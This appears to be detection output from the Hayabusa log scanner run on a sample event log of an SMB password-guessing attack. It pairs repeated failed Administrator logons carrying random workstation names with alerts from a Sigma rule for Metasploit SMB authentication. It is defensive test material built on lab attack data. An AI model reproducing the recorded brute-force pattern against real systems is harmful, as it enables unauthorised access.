SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIyozsYA1Mn27gl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhJopROjHZi6T8aF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QZ6XuZO6fIMg52tV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tvAYEepvDwz93ezW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Er95vLjet49OmSQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKkMGZ5on5L26cip : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dp5dq3YYmmLxperL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: klkWqfYoNQQHRISX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0EekPO3q6qRfq3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfG1x6sL4Aqlj7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: owSUehMmDEhijkfl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
